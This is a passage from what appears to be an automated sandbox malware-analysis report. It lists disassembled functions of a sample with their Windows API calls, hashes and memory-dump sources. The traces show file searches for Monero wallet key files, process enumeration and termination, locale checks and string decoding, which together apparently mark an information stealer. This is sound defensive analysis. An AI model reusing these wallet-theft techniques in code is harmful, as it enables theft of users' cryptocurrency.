                                  • Instruction Fuzzy Hash: 55B2E4F360C2049FE304AE29EC8567AFBE9EF94720F16893DE6C483744EA3558458797
                                  Function 007EDB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008015A8,00800BAF), ref: 007EDBEB
                                  • StrCmpCA.SHLWAPI(?,008015AC), ref: 007EDC33
                                  • StrCmpCA.SHLWAPI(?,008015B0), ref: 007EDC49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 007EDECC
                                  • FindClose.KERNEL32(000000FF), ref: 007EDEDE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: 91d8cfd5c757dfbd534d6f0a3f13992046ff52cccaa31ea1d9a2e5518fd589b9
                                  • Instruction ID: ccff65080310e8db416d05442575da40d6f1454d37e32881b96f094af18317c9
                                  • Opcode Fuzzy Hash: 91d8cfd5c757dfbd534d6f0a3f13992046ff52cccaa31ea1d9a2e5518fd589b9
                                  • Instruction Fuzzy Hash: 5A915DB2600248EBCB14FB74DD5A9FD737DAF98340F008658F91A56191EE389B5CCB52
                                  Function 00C41337 Relevance: 13.0, Strings: 9, Instructions: 1709COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: "+VE$A~w$[$?{$[F5}$[F5}$aZkZ$b)?$kBd$~;<e
                                  • API String ID: 0-544712411
                                  • Opcode ID: 9750fd077aadc4350263658026bbc7e2c4f9ce5d696e6b679b54c0aaf0d3e885
                                  • Instruction ID: 8adfef5ae725a2d8a61b3659ae4e44f1ce75ab79bab0d7f35ff6dcd2190a8be0
                                  • Opcode Fuzzy Hash: 9750fd077aadc4350263658026bbc7e2c4f9ce5d696e6b679b54c0aaf0d3e885
                                  • Instruction Fuzzy Hash: 71B249F3A082149FE3046E2DDC8567BFBD9EF94660F1A863EE9C4D3744E93598018792
                                  Function 007F98E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007F9905
                                  • Process32First.KERNEL32(007E9FDE,00000128), ref: 007F9919
                                  • Process32Next.KERNEL32(007E9FDE,00000128), ref: 007F992E
                                  • StrCmpCA.SHLWAPI(?,007E9FDE), ref: 007F9943
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007F995C
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 007F997A
                                  • CloseHandle.KERNEL32(00000000), ref: 007F9987
                                  • CloseHandle.KERNEL32(007E9FDE), ref: 007F9993
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 2696918072-0
                                  • Opcode ID: 5815ee2ff1a88a9167686e729980b90ebf8cbd70f608d02a07b2ea88bffc057e
                                  • Instruction ID: 5050708c69e3169ece4a3e90232cabcfed53434367c1d5b2c81a08d9e0bdc3d2
                                  • Opcode Fuzzy Hash: 5815ee2ff1a88a9167686e729980b90ebf8cbd70f608d02a07b2ea88bffc057e
                                  • Instruction Fuzzy Hash: 4211F475904218ABDB24DFE5DC48BEDB779BB88701F00468CF605A6251DBB4AB45CFA0
                                  Function 007F7D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                  • GetKeyboardLayoutList.USER32(00000000,00000000,008005B7), ref: 007F7D71
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 007F7D89
                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 007F7D9D
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 007F7DF2
                                  • LocalFree.KERNEL32(00000000), ref: 007F7EB2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: 5cda6cbaf882ebace035f35c184d24f3fe626a377329cfbfe473b91265ebefe9
                                  • Instruction ID: 89ac8d059f1c3e24f973cad9daf3d67099366f0111d65b062f68b12a5132f45d
                                  • Opcode Fuzzy Hash: 5cda6cbaf882ebace035f35c184d24f3fe626a377329cfbfe473b91265ebefe9
                                  • Instruction Fuzzy Hash: 194108B194421CEBCB24DB94DC99BFEB775FB44700F1041D9E20AA6291DB786E84CFA1
                                  Function 00C33985 Relevance: 10.3, Strings: 7, Instructions: 1598COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Cgg$Z`[s$\Q3=$^k^1$cX/$-_$L|I
                                  • API String ID: 0-2937182775
                                  • Opcode ID: 00ab4f0038cd511c379a4b6d9568ef7d897a646cc21c4a62c344162433eabaad
                                  • Instruction ID: f0b62f94c14da9b5503eae5819e970d50aae6845b6d75c16deaad53d4e514c9f
                                  • Opcode Fuzzy Hash: 00ab4f0038cd511c379a4b6d9568ef7d897a646cc21c4a62c344162433eabaad
                                  • Instruction Fuzzy Hash: 8FB2F6F3A0C2009FE704AE29EC8577AB7E9EF94320F1A493DEAC5C7344E63558458796
                                  Function 007EE530 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00800D79), ref: 007EE5A2
                                  • StrCmpCA.SHLWAPI(?,008015F0), ref: 007EE5F2
                                  • StrCmpCA.SHLWAPI(?,008015F4), ref: 007EE608
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 007EECDF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 433455689-1173974218
                                  • Opcode ID: 868dcf68f20d2dca4898ac0b2533be69cfda172163efe08fa07a62be943a9a7f
                                  • Instruction ID: 594aab52d60ca7dd58ee4f2af14572b31a7a2d2fa6c4bc29f2a90107deb1fb9d
                                  • Opcode Fuzzy Hash: 868dcf68f20d2dca4898ac0b2533be69cfda172163efe08fa07a62be943a9a7f
                                  • Instruction Fuzzy Hash: 3B12C2B1A1011CEBCB14FB60DDAAAFD7379AF54300F404599B61E56291EF386B48CB62
                                  Function 00C44AA0 Relevance: 9.1, Strings: 6, Instructions: 1592COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: *bG$<"v1$<A3}$A~|$gv$)zz
                                  • API String ID: 0-730244080
                                  • Opcode ID: 7bd6ce6377ff5651bf3215640694cf0bd80e4f7cf0c8a4bf4803d464da37457f
                                  • Instruction ID: ba9c7d52c69bcc879d94c9474bb7efa88a37563df690a27db7d4269a2a45b4c5
                                  • Opcode Fuzzy Hash: 7bd6ce6377ff5651bf3215640694cf0bd80e4f7cf0c8a4bf4803d464da37457f
                                  • Instruction Fuzzy Hash: 27B2E5F3A0C2049FE3046E2DEC8567ABBE9EF94720F1A453DEAC4C3744EA7558058697
                                  Function 007EA210 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O~,00000000,00000000), ref: 007EA23F
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,007E4F3E,00000000,?), ref: 007EA251
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O~,00000000,00000000), ref: 007EA27A
                                  • LocalFree.KERNEL32(?,?,?,?,007E4F3E,00000000,?), ref: 007EA28F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID: >O~
                                  • API String ID: 4291131564-300424825
                                  • Opcode ID: e1804ec434116b8242ea8a83f5364a8e1fef688660ff52da0119236b343aaf63
                                  • Instruction ID: 84541ec6cd7638eeed7f99483794dac73b59175c75619f943991b27f5a7eb642
                                  • Opcode Fuzzy Hash: e1804ec434116b8242ea8a83f5364a8e1fef688660ff52da0119236b343aaf63
                                  • Instruction Fuzzy Hash: 67119374241308AFEB11CFA4CC95FAA77B9FB89B10F208558FA159B390C7B6A941CB50
                                  Function 00C3F8C3 Relevance: 7.8, Strings: 5, Instructions: 1518COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: _Aeo$bN7_$fB5$j3$/}^
                                  • API String ID: 0-522225641
                                  • Opcode ID: 939957dc9e16ea807590720e212413c8b076b62be66cb3761adc9725a86e1500
                                  • Instruction ID: d02bbfa3c83be676803070173228a656d8a52b4c0b1a29b660ba4db1a9546b8b
                                  • Opcode Fuzzy Hash: 939957dc9e16ea807590720e212413c8b076b62be66cb3761adc9725a86e1500
                                  • Instruction Fuzzy Hash: E8A2F3F3A0C2009FE3046E2DEC8566AFBE5EF94320F1A493DEAC487344E67558458B97
                                  Function 00C30695 Relevance: 7.7, Strings: 5, Instructions: 1431COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
